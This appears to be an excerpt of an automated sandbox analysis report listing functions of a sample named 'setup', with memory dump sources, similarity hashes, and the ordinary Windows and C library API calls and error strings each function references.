                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Invalid window attribute 0x%08X
                                                                                                    • API String ID: 0-4208774108
                                                                                                    • Opcode ID: 4854ac6bceb43022c4550582d4b770341833a148c76317b2cb43c819af25ff56
                                                                                                    • Instruction ID: 33f26f738fb9b17bac02e75c9306ef10e35a6b0ee84a0043fd8d2f9111311ff6
                                                                                                    • Opcode Fuzzy Hash: 4854ac6bceb43022c4550582d4b770341833a148c76317b2cb43c819af25ff56
                                                                                                    • Instruction Fuzzy Hash: 418175706346128BD71CEF68D68D669B7F0FB45304F154979E88ACB312E2B4D9A4CB83
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$exit$Charfreelongjmp
                                                                                                    • String ID: %s$ERROR: archive structure corrupted (bad data)$ERROR: can't alloc %lu memory bytes
                                                                                                    • API String ID: 2693856100-1639016738
                                                                                                    • Opcode ID: ffac1bc9eaf307eafdbdbd19f8f7172ecd2283fc2266ed6a8acb5daebd099507
                                                                                                    • Instruction ID: 1feb88f63b22541d9f45841633f37582b328c597969543a70f28195bc045530a
                                                                                                    • Opcode Fuzzy Hash: ffac1bc9eaf307eafdbdbd19f8f7172ecd2283fc2266ed6a8acb5daebd099507
                                                                                                    • Instruction Fuzzy Hash: 7D6107B6A296168BD710BF28D84231EB6D1EF41304F56843DE49C8B385EB7CD8658B93
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$malloc$exit
                                                                                                    • String ID: ^
                                                                                                    • API String ID: 3267382430-1590793086
                                                                                                    • Opcode ID: 50b023579718e6dc7a7458d052d873712f7dae111a1017cf282b754256a72a33
                                                                                                    • Instruction ID: 7b23f9370c13faf756e9ec721a5e21e641ed609e4ede21d9094f4bae5cb7c660
                                                                                                    • Opcode Fuzzy Hash: 50b023579718e6dc7a7458d052d873712f7dae111a1017cf282b754256a72a33
                                                                                                    • Instruction Fuzzy Hash: 70F03FB49197049BC710BF74D18646DBAE0AF45700F815C2CE9C5AB302D738AAA19F97
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$malloc$exit
                                                                                                    • String ID: ^
                                                                                                    • API String ID: 3267382430-1590793086
                                                                                                    • Opcode ID: 2b22f8c4daf03ea6f2fa7924fcff247b64ac934be604f51fd165028543e58f3c
                                                                                                    • Instruction ID: 6e473ccd630704118c9c50ede39a641ed2e44fa7917cc0629bde1d10906c2ad9
                                                                                                    • Opcode Fuzzy Hash: 2b22f8c4daf03ea6f2fa7924fcff247b64ac934be604f51fd165028543e58f3c
                                                                                                    • Instruction Fuzzy Hash: 0DF06CB4919704ABC710BF74818646DBAF0AF4A700F815C2CF9C9A7302E734EA919F46
                                                                                                    APIs
                                                                                                    • acmStreamConvert.MSACM32(00000000,?,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 0022F427
                                                                                                    • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0022F44D
                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?), ref: 0022F476
                                                                                                    • memcpy.MSVCRT(?,?,?,?), ref: 0022F4BB
                                                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 0022F515
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$ConvertStreammemmove
                                                                                                    • String ID:
                                                                                                    • API String ID: 4264401998-0
                                                                                                    • Opcode ID: a719d8a6d04f680abf2b6c701615adeac726ab5b129c56969de367e6a406cc5b
                                                                                                    • Instruction ID: abd49b3327fb79b2c8093d7bc35a95c2fe51071c0790fc066c098fca2d11b1aa
                                                                                                    • Opcode Fuzzy Hash: a719d8a6d04f680abf2b6c701615adeac726ab5b129c56969de367e6a406cc5b
                                                                                                    • Instruction Fuzzy Hash: 8DB15670610712AFDB64DF69D984A6BB7F5EF84310F00C93DE9AA8A220D770E964CF01
                                                                                                    APIs
                                                                                                    • timeBeginPeriod.WINMM(?), ref: 0023AF9A
                                                                                                      • Part of subcall function 0022EB67: __aullrem.LIBCMT ref: 0022EB7D
                                                                                                    • timeGetTime.WINMM(?,00000000), ref: 0023AFC5
                                                                                                      • Part of subcall function 00221C7A: EnterCriticalSection.KERNEL32(-000012B0,002336BD,?,?,?,?,00000000,00000000), ref: 00221C80
                                                                                                    • timeGetTime.WINMM ref: 0023AFD6
                                                                                                    • WaitForSingleObject.KERNEL32(?,?), ref: 0023AFFC
                                                                                                    • timeEndPeriod.WINMM(?), ref: 0023B0A8
                                                                                                      • Part of subcall function 00221C87: LeaveCriticalSection.KERNEL32(-000012B0,002336D3,?,00C9FE00,?,?,?,?,00000000,00000000), ref: 00221C8D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: time$CriticalPeriodSectionTime$BeginEnterLeaveObjectSingleWait__aullrem
                                                                                                    • String ID:
                                                                                                    • API String ID: 3955597780-0
                                                                                                    • Opcode ID: f6ece7dbae74c9346cea724a5e9fb28e03d7bb77b886005c20ba6e306c26dfd9
                                                                                                    • Instruction ID: f519141b551cb8ba6629caf8bea20124c9034c9ff710735051f0ebc77000affc
                                                                                                    • Opcode Fuzzy Hash: f6ece7dbae74c9346cea724a5e9fb28e03d7bb77b886005c20ba6e306c26dfd9
                                                                                                    • Instruction Fuzzy Hash: F841C2B1A14312ABC711EF65D885A5ABBE5BF48310F00493AF848E7252D771EC20CF92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Fatal error: encode_table() isn't implemented in this coder, xrefs: 002090EB
                                                                                                    • %s, xrefs: 0020910D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: exitlongjmp
                                                                                                    • String ID: %s$Fatal error: encode_table() isn't implemented in this coder
                                                                                                    • API String ID: 2266059207-1718256178
                                                                                                    • Opcode ID: 4bc80eae74ab341eb283327c95d3f89f35d31388b20cbdbfc0818e95c7edd24c
                                                                                                    • Instruction ID: 547a8f9eaf7da482848b4bd390e1d13e6657801ddad9345462a2ebd83564a1d3
                                                                                                    • Opcode Fuzzy Hash: 4bc80eae74ab341eb283327c95d3f89f35d31388b20cbdbfc0818e95c7edd24c
                                                                                                    • Instruction Fuzzy Hash: 7C02BF759153158FDB84EF28C4C025ABBE1FB89314F18866EDC899B38AD330E959CF81
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32 ref: 0024712B
                                                                                                    • FormatMessageW.KERNEL32 ref: 00247163
                                                                                                    • WideCharToMultiByte.KERNEL32 ref: 002471A7
                                                                                                      • Part of subcall function 0023F1D0: strcpy.MSVCRT ref: 0023F235
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharErrorFormatLastMessageMultiWidestrcpy
                                                                                                    • String ID: %s: %s
                                                                                                    • API String ID: 1881214218-3740598653
                                                                                                    • Opcode ID: 9cfb57c07403f7a94e8e430b6ede5a4945d0b0a8b1348c0b53ab875d1deed762
                                                                                                    • Instruction ID: 2fdcd738ccae30b50af8b50940b917df01ac85dce4cf74b9a4b643c1371c263f
                                                                                                    • Opcode Fuzzy Hash: 9cfb57c07403f7a94e8e430b6ede5a4945d0b0a8b1348c0b53ab875d1deed762
                                                                                                    • Instruction Fuzzy Hash: 9821A0B15093429BE320EF29D55875BBBE1BF88308F408A2DE59897291D7B885498B87
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: basic_string::_S_construct null not valid
                                                                                                    • API String ID: 0-290684606
                                                                                                    • Opcode ID: 395c0d0f257db9bb622da910f6d84e964d634f3b6a1bc0482b067c3d309d589f
                                                                                                    • Instruction ID: dc48343eb6ba315e8d837ef22dc2fb324ba0583e7d5b55f52f097dbbfa88c3a2
                                                                                                    • Opcode Fuzzy Hash: 395c0d0f257db9bb622da910f6d84e964d634f3b6a1bc0482b067c3d309d589f
                                                                                                    • Instruction Fuzzy Hash: 85319CB1529342AFC311AF6AC58862BFFE4EF91350F58882EE8CC47302C375D8548B92
                                                                                                    Strings
                                                                                                    • basic_string::_M_construct null not valid, xrefs: 001C9103
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: basic_string::_M_construct null not valid
                                                                                                    • API String ID: 0-3522614731
                                                                                                    • Opcode ID: 2f339ad89ba3ae4c2356d9ba71b16ccef1d5c504ef9c932ca7a8c72f0b8612c2
                                                                                                    • Instruction ID: e9da7b11275a4a66ce4fe69b51ebd1202d9d0f3b3d190b34489fb2569413d19b
                                                                                                    • Opcode Fuzzy Hash: 2f339ad89ba3ae4c2356d9ba71b16ccef1d5c504ef9c932ca7a8c72f0b8612c2
                                                                                                    • Instruction Fuzzy Hash: EB3148B4D046108FCB04EF69C185BAABBF4BF59310F45846EEC98AB346D734D954CBA2
                                                                                                    APIs
                                                                                                    • DeviceIoControl.KERNEL32(00000064,002F0003,0033DB34,00000020,?,00000200,00000064,00000000), ref: 00212554
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,0035BD4C,000000FF,00000000,00000000,00000048), ref: 0021257B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
